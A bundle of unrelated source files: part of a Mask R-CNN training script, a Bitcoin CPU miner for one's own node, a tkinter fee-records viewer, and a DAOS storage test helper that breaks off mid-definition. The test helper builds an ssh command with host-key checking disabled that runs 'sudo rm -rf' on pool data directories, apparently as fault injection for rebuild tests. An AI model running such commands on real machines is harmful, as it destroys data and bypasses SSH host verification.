training. ' 'Will be set to rpn_train_pre_nms if it is larger than ' 'rpn_train_pre_nms.') custom_model_parser.add_argument( '--rpn-test-pre-nms', type=int, default=6000, help='Filter top proposals before NMS in RPN testing.') custom_model_parser.add_argument( '--rpn-test-post-nms', type=int, default=1000, help='Return top proposal results after NMS in RPN testing. ' 'Will be set to rpn_test_pre_nms if it is larger than rpn_test_pre_nms.') custom_model_parser.add_argument( '--rpn-min-size', type=int, default=1, help='Proposals whose size is smaller than ``min_size`` will be discarded.') custom_model_parser.add_argument( '--rcnn-num-samples', type=int, default=512, help='Number of samples for RCNN training.') custom_model_parser.add_argument( '--rcnn-pos-iou-thresh', type=float, default=0.5, help='Proposal whose IOU larger than ``pos_iou_thresh`` is ' 'regarded as positive samples for R-CNN.') custom_model_parser.add_argument( '--rcnn-pos-ratio', type=float, default=0.25, help='``pos_ratio`` defines how many positive samples ' '(``pos_ratio * num_sample``) is to be sampled for R-CNN.') custom_model_parser.add_argument( '--max-num-gt', type=int, default=100, help='Maximum ground-truth number for each example. This is only an upper bound, not' 'necessarily very precise. However, using a very big number may impact the ' 'training speed.') custom_model_parser.add_argument( '--target-roi-scale', type=int, default=2, help='Ratio of mask output roi / input roi. ' 'For model with FPN, this is typically 2.') custom_model_parser.add_argument( '--num-mask-head-convs', type=int, default=4, help='Number of convolution blocks before deconv layer for mask head. ' 'For FPN network this is typically 4.') args = parser.parse_args() if args.horovod: if hvd is None: raise SystemExit("Horovod not found, please check if you installed it correctly.") hvd.init() args.epochs = int(args.epochs) if args.epochs else 26 args.lr_decay_epoch = args.lr_decay_epoch if args.lr_decay_epoch else '17,23' args.lr = float(args.lr) if args.lr else (0.00125 * args.batch_size) args.lr_warmup = args.lr_warmup if args.lr_warmup else max((8000 / args.batch_size), 1000) args.wd = float(args.wd) if args.wd else 1e-4 def str_args2num_args(arguments, args_name, num_type): try: ret = [num_type(x) for x in arguments.split(',')] if len(ret) == 1: return ret[0] return ret except ValueError: raise ValueError('invalid value for', args_name, arguments) if args.custom_model: args.image_short = str_args2num_args(args.image_short, '--image-short', int) args.roi_size = str_args2num_args(args.roi_size, '--roi-size', int) args.strides = str_args2num_args(args.strides, '--strides', int) args.anchor_aspect_ratio = str_args2num_args(args.anchor_aspect_ratio, '--anchor-aspect-ratio', float) args.anchor_scales = str_args2num_args(args.anchor_scales, '--anchor-scales', float) args.anchor_alloc_size = str_args2num_args(args.anchor_alloc_size, '--anchor-alloc-size', int) if args.amp and args.norm_layer == 'bn': raise NotImplementedError('SyncBatchNorm currently does not support AMP.') return args def get_dataset(dataset, args): if dataset.lower() == 'coco': train_dataset = gdata.COCOInstance(splits='instances_train2017') val_dataset = gdata.COCOInstance(splits='instances_val2017', skip_empty=False) starting_id = 0 if args.horovod and MPI: length = len(val_dataset) shard_len = length // hvd.size() rest = length % hvd.size() # Compute the start index for this partition starting_id = shard_len * hvd.rank() + min(hvd.rank(), rest) val_metric = COCOInstanceMetric(val_dataset, args.save_prefix + '_eval', use_ext=args.use_ext, starting_id=starting_id) else: raise NotImplementedError('Dataset: {} not implemented.'.format(dataset)) if args.horovod and MPI: val_dataset = val_dataset.shard(hvd.size(), hvd.rank()) return train_dataset, val_dataset, val_metric def get_dataloader(net, train_dataset, val_dataset, train_transform, val_transform, batch_size, num_shards_per_process, args): """Get dataloader.""" train_bfn = batchify.MaskRCNNTrainBatchify(net, num_shards_per_process) if _PRE_GCV_0_9_0: sampler = gcv.nn.sampler else: sampler = gcv.data.sampler train_sampler = \ sampler.SplitSortedBucketSampler(train_dataset.get_im_aspect_ratio(), batch_size, num_parts=hvd.size() if args.horovod else 1, part_index=hvd.rank() if args.horovod else 0, shuffle=True) train_loader = mx.gluon.data.DataLoader(train_dataset.transform( train_transform(net.short, net.max_size, net, ashape=net.ashape, multi_stage=args.use_fpn)), batch_sampler=train_sampler, batchify_fn=train_bfn, num_workers=args.num_workers) val_bfn = batchify.Tuple(*[batchify.Append() for _ in range(2)]) short = net.short[-1] if isinstance(net.short, (tuple, list)) else net.short # validation use 1 sample per device val_loader = mx.gluon.data.DataLoader( val_dataset.transform(val_transform(short, net.max_size)), num_shards_per_process, False, batchify_fn=val_bfn, last_batch='keep', num_workers=args.num_workers) return train_loader, val_loader def save_params(net, logger, best_map, current_map, epoch, save_interval, prefix): current_map = float(current_map) if current_map > best_map[0]: logger.info('[Epoch {}] mAP {} higher than current best {} saving to {}'.format( epoch, current_map, best_map, '{:s}_best.params'.format(prefix))) best_map[0] = current_map net.save_parameters('{:s}_best.params'.format(prefix)) with open(prefix + '_best_map.log', 'a') as f: f.write('\n{:04d}:\t{:.4f}'.format(epoch, current_map)) if save_interval and (epoch + 1) % save_interval == 0: logger.info('[Epoch {}] Saving parameters to {}'.format( epoch, '{:s}_{:04d}_{:.4f}.params'.format(prefix, epoch, current_map))) net.save_parameters('{:s}_{:04d}_{:.4f}.params'.format(prefix, epoch, current_map)) def _stage_data(i, data, ctx_list, pinned_data_stage): def _get_chunk(data, storage): s = storage.reshape(shape=(storage.size,)) s = s[:data.size] s = s.reshape(shape=data.shape) data.copyto(s) return s if ctx_list[0].device_type == "cpu": return data if i not in pinned_data_stage: pinned_data_stage[i] = [d.as_in_context(mx.cpu_pinned()) for d in data] return pinned_data_stage[i] storage = pinned_data_stage[i] for j in range(len(storage)): if data[j].size > storage[j].size: storage[j] = data[j].as_in_context(mx.cpu_pinned()) return [_get_chunk(d, s) for d, s in zip(data, storage)] pinned_data_stage = {} def split_and_load(batch, ctx_list): """Split data to 1 batch each device.""" new_batch = [] for i, data in enumerate(batch): if isinstance(data, (list, tuple)): new_data = [x.as_in_context(ctx) for x, ctx in zip(data, ctx_list)] else: new_data = [data.as_in_context(ctx_list[0])] new_batch.append(new_data) return new_batch def validate(net, val_data, async_eval_processes, ctx, eval_metric, logger, epoch, best_map, args): """Test on validation dataset.""" clipper = gcv.nn.bbox.BBoxClipToImage() eval_metric.reset() if not args.disable_hybridization: net.hybridize(static_alloc=args.static_alloc) tic = time.time() for ib, batch in enumerate(val_data): batch = split_and_load(batch, ctx_list=ctx) det_bboxes = [] det_ids = [] det_scores = [] det_masks = [] det_infos = [] for x, im_info in zip(*batch): # get prediction results ids, scores, bboxes, masks = net(x) det_bboxes.append(clipper(bboxes, x)) det_ids.append(ids) det_scores.append(scores) det_masks.append(masks) det_infos.append(im_info) # update metric for det_bbox, det_id, det_score, det_mask, det_info in zip(det_bboxes, det_ids, det_scores, det_masks, det_infos): for i in range(det_info.shape[0]): # numpy everything det_bbox = det_bbox[i].asnumpy() det_id = det_id[i].asnumpy() det_score = det_score[i].asnumpy() det_mask = det_mask[i].asnumpy() det_info = det_info[i].asnumpy() # filter by conf threshold im_height, im_width, im_scale = det_info valid = np.where(((det_id >= 0) & (det_score >= 0.001)))[0] det_id = det_id[valid] det_score = det_score[valid] det_bbox = det_bbox[valid] / im_scale det_mask = det_mask[valid] # fill full mask im_height, im_width = int(round(im_height / im_scale)), int( round(im_width / im_scale)) full_masks = gdata.transforms.mask.fill(det_mask, det_bbox, (im_width, im_height)) eval_metric.update(det_bbox, det_id, det_score, full_masks) if args.horovod and MPI is not None: comm = MPI.COMM_WORLD res = comm.gather(eval_metric.get_result_buffer(), root=0) if hvd.rank() == 0: logger.info('[Epoch {}] Validation Inference cost: {:.3f}' .format(epoch, (time.time() - tic))) rank0_res = eval_metric.get_result_buffer() if len(rank0_res) == 2: res = res[1:] rank0_res[0].extend([item for res_tuple in res for item in res_tuple[0]]) rank0_res[1].extend([item for res_tuple in res for item in res_tuple[1]]) else: rank0_res.extend([item for r in res for item in r]) def coco_eval_save_task(eval_metric, logger): map_name, mean_ap = eval_metric.get() if map_name and mean_ap is not None: val_msg = '\n'.join(['{}={}'.format(k, v) for k, v in zip(map_name, mean_ap)]) logger.info('[Epoch {}] Validation: \n{}'.format(epoch, val_msg)) current_map = float(mean_ap[-1]) save_params(net, logger, best_map, current_map, epoch, args.save_interval, args.save_prefix) if not args.horovod or hvd.rank() == 0: p = Process(target=coco_eval_save_task, args=(eval_metric, logger)) async_eval_processes.append(p) p.start() def get_lr_at_iter(alpha, lr_warmup_factor=1. / 3.): return lr_warmup_factor * (1 - alpha) + alpha def train(net, train_data, val_data, eval_metric, batch_size, ctx, logger, args): """Training pipeline""" args.kv_store = 'device' if (args.amp and 'nccl' in args.kv_store) else args.kv_store kv = mx.kvstore.create(args.kv_store) net.collect_params().setattr('grad_req', 'null') net.collect_train_params().setattr('grad_req', 'write') for k, v in net.collect_params('.*bias').items(): v.wd_mult = 0.0 optimizer_params = {'learning_rate': args.lr, 'wd': args.wd, 'momentum': args.momentum, } if args.clip_gradient > 0.0: optimizer_params['clip_gradient'] = args.clip_gradient if args.amp: optimizer_params['multi_precision'] = True if args.horovod: hvd.broadcast_parameters(net.collect_params(), root_rank=0) trainer = hvd.DistributedTrainer( net.collect_train_params(), # fix batchnorm, fix first stage, etc... 'sgd', optimizer_params ) else: trainer = gluon.Trainer( net.collect_train_params(), # fix batchnorm, fix first stage, etc... 'sgd', optimizer_params, update_on_kvstore=(False if args.amp else None), kvstore=kv) if args.amp: amp.init_trainer(trainer) # lr decay policy lr_decay = float(args.lr_decay) lr_steps = sorted([float(ls) for ls in args.lr_decay_epoch.split(',') if ls.strip()]) lr_warmup = float(args.lr_warmup) # avoid int division rpn_cls_loss = mx.gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False) rpn_box_loss = mx.gluon.loss.HuberLoss(rho=args.rpn_smoothl1_rho) # == smoothl1 rcnn_cls_loss = mx.gluon.loss.SoftmaxCrossEntropyLoss() rcnn_box_loss = mx.gluon.loss.HuberLoss(rho=args.rcnn_smoothl1_rho) # == smoothl1 rcnn_mask_loss = mx.gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False) metrics = [mx.metric.Loss('RPN_Conf'), mx.metric.Loss('RPN_SmoothL1'), mx.metric.Loss('RCNN_CrossEntropy'), mx.metric.Loss('RCNN_SmoothL1'), mx.metric.Loss('RCNN_Mask')] rpn_acc_metric = RPNAccMetric() rpn_bbox_metric = RPNL1LossMetric() rcnn_acc_metric = RCNNAccMetric() rcnn_bbox_metric = RCNNL1LossMetric() rcnn_mask_metric = MaskAccMetric() rcnn_fgmask_metric = MaskFGAccMetric() metrics2 = [rpn_acc_metric, rpn_bbox_metric, rcnn_acc_metric, rcnn_bbox_metric, rcnn_mask_metric, rcnn_fgmask_metric] async_eval_processes = [] logger.info(args) if args.verbose: logger.info('Trainable parameters:') logger.info(net.collect_train_params().keys()) logger.info('Start training from [Epoch {}]'.format(args.start_epoch)) best_map = [0] base_lr = trainer.learning_rate for epoch in range(args.start_epoch, args.epochs): rcnn_task = ForwardBackwardTask(net, trainer, rpn_cls_loss, rpn_box_loss, rcnn_cls_loss, rcnn_box_loss, rcnn_mask_loss, args.amp) executor = Parallel(args.executor_threads, rcnn_task) if not args.horovod else None if not args.disable_hybridization: net.hybridize(static_alloc=args.static_alloc) while lr_steps and epoch >= lr_steps[0]: new_lr = trainer.learning_rate * lr_decay lr_steps.pop(0) trainer.set_learning_rate(new_lr) logger.info("[Epoch {}] Set learning rate to {}".format(epoch, new_lr)) for metric in metrics: metric.reset() tic = time.time() btic = time.time() speed = [] train_data_iter = iter(train_data) next_data_batch = next(train_data_iter) next_data_batch = split_and_load(next_data_batch, ctx_list=ctx) for i in range(len(train_data)): batch = next_data_batch if i + epoch * len(train_data) <= lr_warmup: # adjust based on real percentage new_lr = base_lr * get_lr_at_iter((i + epoch * len(train_data)) / lr_warmup, args.lr_warmup_factor) if new_lr != trainer.learning_rate: if i % args.log_interval == 0: logger.info('[Epoch {} Iteration {}] Set learning rate to {}' .format(epoch, i, new_lr)) trainer.set_learning_rate(new_lr) metric_losses = [[] for _ in metrics] add_losses = [[] for _ in metrics2] if executor is not None: for data in zip(*batch): executor.put(data) for j in range(len(ctx)): if executor is not None: result = executor.get() else: result = rcnn_task.forward_backward(list(zip(*batch))[0]) if (not args.horovod) or hvd.rank() == 0: for k in range(len(metric_losses)): metric_losses[k].append(result[k]) for k in range(len(add_losses)): add_losses[k].append(result[len(metric_losses) + k]) try: # prefetch next batch next_data_batch = next(train_data_iter) next_data_batch = split_and_load(next_data_batch, ctx_list=ctx) except StopIteration: pass trainer.step(batch_size) for metric, record in zip(metrics, metric_losses): metric.update(0, record) for metric, records in zip(metrics2, add_losses): for pred in records: metric.update(pred[0], pred[1]) if (not args.horovod or hvd.rank() == 0) and args.log_interval \ and not (i + 1) % args.log_interval: msg = ','.join(['{}={:.3f}'.format(*metric.get()) for metric in metrics + metrics2]) batch_speed = args.log_interval * args.batch_size / (time.time() - btic) speed.append(batch_speed) logger.info('[Epoch {}][Batch {}], Speed: {:.3f} samples/sec, {}'.format( epoch, i, batch_speed, msg)) btic = time.time() if speed: avg_batch_speed = sum(speed) / len(speed) # validate and save params if (not args.horovod) or hvd.rank() == 0: msg = ','.join(['{}={:.3f}'.format(*metric.get()) for metric in metrics]) logger.info('[Epoch {}] Training cost: {:.3f}, Speed: {:.3f} samples/sec, {}'.format( epoch, (time.time() - tic), avg_batch_speed, msg)) if not (epoch + 1) % args.val_interval: # consider reduce the frequency of validation to save time validate(net, val_data, async_eval_processes, ctx, eval_metric, logger, epoch, best_map, args) elif (not args.horovod) or hvd.rank() == 0: current_map = 0. save_params(net, logger, best_map, current_map, epoch, args.save_interval, args.save_prefix) for thread in async_eval_processes: thread.join() if __name__ == '__main__': args = parse_args() # fix seed for mxnet, numpy and python builtin random generator. gutils.random.seed(args.seed) if args.amp: amp.init() # training contexts if args.horovod: ctx = [mx.gpu(hvd.local_rank())] else: ctx = [mx.gpu(int(i)) for i in args.gpus.split(',') if i.strip()] ctx = ctx if ctx else [mx.cpu()] # network kwargs = {} module_list = [] if args.use_fpn: module_list.append('fpn') if args.norm_layer is not None: module_list.append(args.norm_layer) if args.norm_layer == 'bn': kwargs['num_devices'] = len(ctx) num_gpus = hvd.size() if args.horovod else len(ctx) net_name = '_'.join(('mask_rcnn', *module_list, args.network, args.dataset)) if args.custom_model: args.use_fpn = True net_name = '_'.join(('mask_rcnn_fpn', args.network, args.dataset)) if args.norm_layer == 'bn': norm_layer = gluon.contrib.nn.SyncBatchNorm norm_kwargs = {'num_devices': len(ctx)} sym_norm_layer = mx.sym.contrib.SyncBatchNorm sym_norm_kwargs = {'ndev': len(ctx)} elif args.norm_layer == 'gn': norm_layer = gluon.nn.GroupNorm norm_kwargs = {'groups': 8} sym_norm_layer = mx.sym.GroupNorm sym_norm_kwargs = {'groups': 8} else: norm_layer = gluon.nn.BatchNorm norm_kwargs = None sym_norm_layer = None sym_norm_kwargs = None if args.dataset == 'coco': classes = COCODetection.CLASSES else: # default to VOC classes = VOCDetection.CLASSES net = get_model('custom_mask_rcnn_fpn', classes=classes, transfer=None, dataset=args.dataset, pretrained_base=not args.no_pretrained_base, base_network_name=args.network, norm_layer=norm_layer, norm_kwargs=norm_kwargs, sym_norm_kwargs=sym_norm_kwargs, num_fpn_filters=args.num_fpn_filters, num_box_head_conv=args.num_box_head_conv, num_box_head_conv_filters=args.num_box_head_conv_filters, num_box_head_dense_filters=args.num_box_head_dense_filters, short=args.image_short, max_size=args.image_max_size, min_stage=2, max_stage=6, nms_thresh=args.nms_thresh, nms_topk=args.nms_topk, post_nms=args.post_nms, roi_mode=args.roi_mode, roi_size=args.roi_size, strides=args.strides, clip=args.clip, rpn_channel=args.rpn_channel, base_size=args.anchor_base_size, scales=args.anchor_scales, ratios=args.anchor_aspect_ratio, alloc_size=args.anchor_alloc_size, rpn_nms_thresh=args.rpn_nms_thresh, rpn_train_pre_nms=args.rpn_train_pre_nms, rpn_train_post_nms=args.rpn_train_post_nms, rpn_test_pre_nms=args.rpn_test_pre_nms, rpn_test_post_nms=args.rpn_test_post_nms, rpn_min_size=args.rpn_min_size, per_device_batch_size=args.batch_size // num_gpus, num_sample=args.rcnn_num_samples, pos_iou_thresh=args.rcnn_pos_iou_thresh, pos_ratio=args.rcnn_pos_ratio, max_num_gt=args.max_num_gt, target_roi_scale=args.target_roi_scale, num_fcn_convs=args.num_mask_head_convs) else: net = get_model(net_name, pretrained_base=True, per_device_batch_size=args.batch_size // num_gpus, **kwargs) args.save_prefix += net_name if args.resume.strip(): net.load_parameters(args.resume.strip()) else: for param in net.collect_params().values(): if param._data is not None: continue param.initialize() net.collect_params().reset_ctx(ctx) if args.amp: # Cast both weights and gradients to 'float16' net.cast('float16') # This layers doesn't support type 'float16' net.collect_params('.*batchnorm.*').setattr('dtype', 'float32') net.collect_params('.*normalizedperclassboxcenterencoder.*').setattr('dtype', 'float32') # set up logger logging.basicConfig() logger = logging.getLogger() logger.setLevel(logging.INFO) log_file_path = args.save_prefix + '_train.log' log_dir = os.path.dirname(log_file_path) if log_dir and not os.path.exists(log_dir): os.makedirs(log_dir) fh = logging.FileHandler(log_file_path) logger.addHandler(fh) if MPI is None and args.horovod: logger.warning('mpi4py is not installed, validation result may be incorrect.') # training data train_dataset, val_dataset, eval_metric = get_dataset(args.dataset, args) batch_size = args.batch_size // num_gpus if args.horovod else args.batch_size train_data, val_data = get_dataloader( net, train_dataset, val_dataset, MaskRCNNDefaultTrainTransform, MaskRCNNDefaultValTransform, batch_size, len(ctx), args) # training train(net, train_data, val_data, eval_metric, batch_size, ctx, logger, args)
pyminer.py
#!/usr/bin/python # # Copyright (c) 2011 The Bitcoin developers # Distributed under the MIT/X11 software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # import time import json import pprint import hashlib import struct import re import base64 import httplib import sys from multiprocessing import Process ERR_SLEEP = 15 MAX_NONCE = 1000000L settings = {} pp = pprint.PrettyPrinter(indent=4) class BitcoinRPC: OBJID = 1 def __init__(self, host, port, username, password): authpair = "%s:%s" % (username, password) self.authhdr = "Basic %s" % (base64.b64encode(authpair)) self.conn = httplib.HTTPConnection(host, port, False, 30) def rpc(self, method, params=None): self.OBJID += 1 obj = { 'version' : '1.1', 'method' : method, 'id' : self.OBJID } if params is None: obj['params'] = [] else: obj['params'] = params self.conn.request('POST', '/', json.dumps(obj), { 'Authorization' : self.authhdr, 'Content-type' : 'application/json' }) resp = self.conn.getresponse() if resp is None: print "JSON-RPC: no response" return None body = resp.read() resp_obj = json.loads(body) if resp_obj is None: print "JSON-RPC: cannot JSON-decode body" return None if 'error' in resp_obj and resp_obj['error'] != None: return resp_obj['error'] if 'result' not in resp_obj: print "JSON-RPC: no result in object" return None return resp_obj['result'] def getblockcount(self): return self.rpc('getblockcount') def getwork(self, data=None): return self.rpc('getwork', data) def uint32(x): return x & 0xffffffffL def bytereverse(x): return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) | (((x) >> 8) & 0x0000ff00) | ((x) >> 24) )) def bufreverse(in_buf): out_words = [] for i in range(0, len(in_buf), 4): word = struct.unpack('@I', in_buf[i:i+4])[0] out_words.append(struct.pack('@I', bytereverse(word))) return ''.join(out_words) def wordreverse(in_buf): out_words = [] for i in range(0, len(in_buf), 4): out_words.append(in_buf[i:i+4]) out_words.reverse() return ''.join(out_words) class Miner: def __init__(self, id): self.id = id self.max_nonce = MAX_NONCE def work(self, datastr, targetstr): # decode work data hex string to binary static_data = datastr.decode('hex') static_data = bufreverse(static_data) # the first 76b of 80b do not change blk_hdr = static_data[:76] # decode 256-bit target value targetbin = targetstr.decode('hex') targetbin = targetbin[::-1] # byte-swap and dword-swap targetbin_str = targetbin.encode('hex') target = long(targetbin_str, 16) # pre-hash first 76b of block header static_hash = hashlib.sha256() static_hash.update(blk_hdr) for nonce in xrange(self.max_nonce): # encode 32-bit nonce value nonce_bin = struct.pack("<I", nonce) # hash final 4b, the nonce value hash1_o = static_hash.copy() hash1_o.update(nonce_bin) hash1 = hash1_o.digest() # sha256 hash of sha256 hash hash_o = hashlib.sha256() hash_o.update(hash1) hash = hash_o.digest() # quick test for winning solution: high 32 bits zero? if hash[-4:] != '\0\0\0\0': continue # convert binary hash to 256-bit Python long hash = bufreverse(hash) hash = wordreverse(hash) hash_str = hash.encode('hex') l = long(hash_str, 16) # proof-of-work test: hash < target if l < target: print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,) return (nonce + 1, nonce_bin) else: print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,) # return (nonce + 1, nonce_bin) return (nonce + 1, None) def submit_work(self, rpc, original_data, nonce_bin): nonce_bin = bufreverse(nonce_bin) nonce = nonce_bin.encode('hex') solution = original_data[:152] + nonce + original_data[160:256] param_arr = [ solution ] result = rpc.getwork(param_arr) print time.asctime(), "--> Upstream RPC result:", result def iterate(self, rpc): work = rpc.getwork() if work is None: time.sleep(ERR_SLEEP) return if 'data' not in work or 'target' not in work: time.sleep(ERR_SLEEP) return time_start = time.time() (hashes_done, nonce_bin) = self.work(work['data'], work['target']) time_end = time.time() time_diff = time_end - time_start self.max_nonce = long( (hashes_done * settings['scantime']) / time_diff) if self.max_nonce > 0xfffffffaL: self.max_nonce = 0xfffffffaL if settings['hashmeter']: print "HashMeter(%d): %d hashes, %.2f Khash/sec" % ( self.id, hashes_done, (hashes_done / 1000.0) / time_diff) if nonce_bin is not None: self.submit_work(rpc, work['data'], nonce_bin) def loop(self): rpc = BitcoinRPC(settings['host'], settings['port'], settings['rpcuser'], settings['rpcpass']) if rpc is None: return while True: self.iterate(rpc) def miner_thread(id): miner = Miner(id) miner.loop() if __name__ == '__main__': if len(sys.argv) != 2: print "Usage: pyminer.py CONFIG-FILE" sys.exit(1) f = open(sys.argv[1]) for line in f: # skip comment lines m = re.search('^\s*#', line) if m: continue # parse key=value lines m = re.search('^(\w+)\s*=\s*(\S.*)$', line) if m is None: continue settings[m.group(1)] = m.group(2) f.close() if 'host' not in settings: settings['host'] = '127.0.0.1' if 'port' not in settings: settings['port'] = 29377 if 'threads' not in settings: settings['threads'] = 1 if 'hashmeter' not in settings: settings['hashmeter'] = 0 if 'scantime' not in settings: settings['scantime'] = 30L if 'rpcuser' not in settings or 'rpcpass' not in settings: print "Missing username and/or password in cfg file" sys.exit(1) settings['port'] = int(settings['port']) settings['threads'] = int(settings['threads']) settings['hashmeter'] = int(settings['hashmeter']) settings['scantime'] = long(settings['scantime']) thr_list = [] for thr_id in range(settings['threads']): p = Process(target=miner_thread, args=(thr_id,)) p.start() thr_list.append(p) time.sleep(1) # stagger threads print settings['threads'], "mining threads started" print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port']) try: for thr_proc in thr_list: thr_proc.join() except KeyboardInterrupt: pass print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
Records.py
# This folder contains program to access the records of fee depositors # Importing necessary libraries print('Importing necessary libraries for deposit records...') import time import threading from Classes import * from tkinter import ttk from tkinter import * import pandas as pd from pandastable import Table table = pd.read_excel('Deposit_Records.xlsx') def imports(): global Calendar, DateEntry, datetime, pd, plt, string, os, pywhatkit from tkcalendar import Calendar, DateEntry print('Calendar, DateEntry imported') from datetime import datetime print('Datetime imported') import pandas as pd print('Pandas imported') import matplotlib.pyplot as plt print('Matplotlib imported') import string print('String imported') import os print('OS imported') import pywhatkit print('Pywhatkit imported') threading.Thread(target=imports).start() def deposit_records(): # Preparing window... print('Preparing deposit records accessor window...') depo_rec = Tk() depo_rec_gui = window(depo_rec, 'Deposit Records') depo_rec_lf1 = LabelFrame(depo_rec, text='Records', relief='groove', bd=10) depo_rec_lf1.grid(row=1, column=0, columnspan=2, padx=10, pady=10) # Making labels and boxes for type of record user wants to access depo_rec_l1 = Label(depo_rec_lf1) depo_rec_l1_gui = window.label( depo_rec_l1, 'Please select whose records you want to access: ', 0, 0) classes=[str(i) for i in list(table.Class.unique())] names=list(table.Name.unique()) names.sort() options = ['All History']+classes+names # Contains list of all names and classes variable=StringVar() depo_rec_combobox1 = ttk.Combobox(depo_rec_lf1, textvariable=variable) depo_rec_combobox1_gui = window.combobox(depo_rec_combobox1, options, 0, 1) # Program for submit button def depo_rec_b1_func(): f1 = Frame(depo_rec, relief='groove', bd=10) f1.grid(row=2, column=0, columnspan=3, padx=10, pady=10) if depo_rec_combobox1.get() in classes: try: real_class=int(depo_rec_combobox1.get()) except Exception: real_class = depo_rec_combobox1.get() tb=Table(f1, dataframe=table[table['Class']==real_class], showtoolbar=True, showstatusbar=True) tb.show() elif depo_rec_combobox1.get() in names: tb = Table(f1, dataframe=table.loc[table['Name'] == depo_rec_combobox1.get( )], showtoolbar=True, showstatusbar=True) tb.show() else: tb = Table(f1, dataframe=table, showtoolbar=True, showstatusbar=True) tb.show() depo_rec_b1 = ttk.Button(depo_rec, text='Submit', command=depo_rec_b1_func) depo_rec_b1.grid(row=1, column=2, padx=5, pady=5) depo_rec.mainloop()
osa_utils.py
#!/usr/bin/python3 """ (C) Copyright 2020-2021 Intel Corporation. SPDX-License-Identifier: BSD-2-Clause-Patent """ import ctypes import queue import time import threading import re from avocado import fail_on from ior_test_base import IorTestBase from mdtest_test_base import MdtestBase from command_utils import CommandFailure from pydaos.raw import (DaosContainer, IORequest, DaosObj, DaosApiError) from general_utils import create_string_buffer, run_command class OSAUtils(MdtestBase, IorTestBase): # pylint: disable=too-many-ancestors """ Test Class Description: This test runs daos_server offline drain test cases. :avocado: recursive """ def setUp(self): """Set up for test case.""" super().setUp() self.pool_cont_dict = {} self.container = None self.obj = None self.ioreq = None self.dmg_command = self.get_dmg_command() self.no_of_dkeys = self.params.get("no_of_dkeys", '/run/dkeys/*', default=[0])[0] self.no_of_akeys = self.params.get("no_of_akeys", '/run/akeys/*', default=[0])[0] self.record_length = self.params.get("length", '/run/record/*', default=[0])[0] self.ior_w_flags = self.params.get("write_flags", '/run/ior/iorflags/*', default="") self.ior_r_flags = self.params.get("read_flags", '/run/ior/iorflags/*') self.server_count = len(self.hostlist_servers) self.engine_count = self.server_managers[0].get_config_value( "engines_per_host") self.out_queue = queue.Queue() self.dmg_command.exit_status_exception = False self.test_during_aggregation = False self.test_during_rebuild = False self.test_with_checksum = True # By default, test_with_rf is set to False. # It is up to individual test to enable it. self.test_with_rf = False self.test_with_blank_node = False self.test_with_snapshot = False @fail_on(CommandFailure) def get_pool_leader(self): """Get the pool leader. Returns: int: pool leader value """ data = self.dmg_command.pool_query(self.pool.uuid) return int(data["response"]["leader"]) @fail_on(CommandFailure) def get_rebuild_status(self): """Get the rebuild status. Returns: str: rebuild status """ data = self.dmg_command.pool_query(self.pool.uuid) return data["response"]["rebuild"]["status"] @fail_on(CommandFailure) def get_rebuild_state(self): """Get the rebuild state. Returns: str: rebuild state """ data = self.dmg_command.pool_query(self.pool.uuid) return data["response"]["rebuild"]["state"] @fail_on(CommandFailure) def is_rebuild_done(self, time_interval, wait_for_rebuild_to_complete=False): """Rebuild is completed/done. Args: time_interval: Wait interval between checks wait_for_rebuild_to_complete: Rebuild completed (Default: False) """ self.pool.wait_for_rebuild(wait_for_rebuild_to_complete, interval=time_interval) @fail_on(CommandFailure) def assert_on_rebuild_failure(self): """If the rebuild is not successful, raise assert. """ rebuild_status = self.get_rebuild_status() self.log.info("Rebuild Status: %s", rebuild_status) rebuild_failed_string = ["failed", "scanning", "aborted", "busy"] self.assertTrue(rebuild_status not in rebuild_failed_string, "Rebuild failed") @fail_on(CommandFailure) def print_and_assert_on_rebuild_failure(self, out, timeout=3): """Print the out value (daos, dmg, etc) and check for rebuild completion. If not, raise assert. """ self.log.info(out) self.is_rebuild_done(timeout) self.assert_on_rebuild_failure() @fail_on(CommandFailure) def get_pool_version(self): """Get the pool version. Returns: int: pool_version_value """ data = self.dmg_command.pool_query(self.pool.uuid) return int(data["response"]["version"]) @fail_on(CommandFailure) def get_ipaddr_for_rank(self, rank=None): """Obtain the IPAddress and port number for a particular server rank. Args: rank (int): daos_engine rank. Defaults to None. Returns: ip_addr (str) : IPAddress for the rank. port_num (str) : Port number for the rank. """ output = self.dmg_command.system_query() members_length = self.server_count * self.engine_count for i in range(0, members_length): if rank == int(output["response"]["members"][i]["rank"]): temp = output["response"]["members"][i]["addr"] ip_addr = temp.split(":") temp = output["response"]["members"][i]["fabric_uri"] port_num = temp.split(":") return ip_addr[0], port_num[2] return None, None @fail_on(CommandFailure) def remove_pool_dir(self, ip_addr=None, port_num=None): """Remove the /mnt/daos[x]/<pool_uuid>/vos-* directory Args: ip_addr (str): IP address of the daos server. Defaults to None. port_number (str) : Port number the daos server. """ # Create the expected port list # expected_ports = [port0] - Single engine/server # expected_ports = [port0, port1] - Two engine/server expected_ports = [engine_param.get_value("fabric_iface_port") for engine_param in self.server_managers[-1]. manager.job.yaml.engine_params] self.log.info("Expected ports : %s", expected_ports) if ip_addr is None or port_num is None: self.log.info("ip_addr : %s port_number: %s", ip_addr, port_num) self.fail("No IP Address or Port number provided") else: if self.engine_count == 1: self.log.info("Single Engine per Server") cmd = "/usr/bin/ssh {} -oStrictHostKeyChecking=no \ sudo rm -rf /mnt/daos/{}/vos-*". \ format(ip_addr, self.pool.uuid) elif self.engine_count == 2: if port_num == str(expected_ports[0]): port_val = 0 elif port_num == str(expected_ports[1]): port_val = 1 else: self.log.info("port_number: %s", port_num) self.fail("Invalid port number") cmd = "/usr/bin/ssh {} -oStrictHostKeyChecking=no \ sudo rm -rf /mnt/daos{}/{}/vos-*". \ format(ip_addr, port_val, self.pool.uuid) else: self.fail("Not supported engine per server configuration") run_command(cmd) def set_container(self, container): """Set the OSA utils container object. Args: container (obj) : Container object to be used within OSA utils. """ self.container = container def simple_osa_reintegrate_loop(self, rank, action="exclude", loop_time=100): """This method performs exclude or drain and reintegration on a rank for a certain amount of time. Args: rank (int): daos server rank. action (str) : "exclude" or "drain". Defaults to "exclude" loop_time: Total time to perform drain/reintegrate operation in a loop. 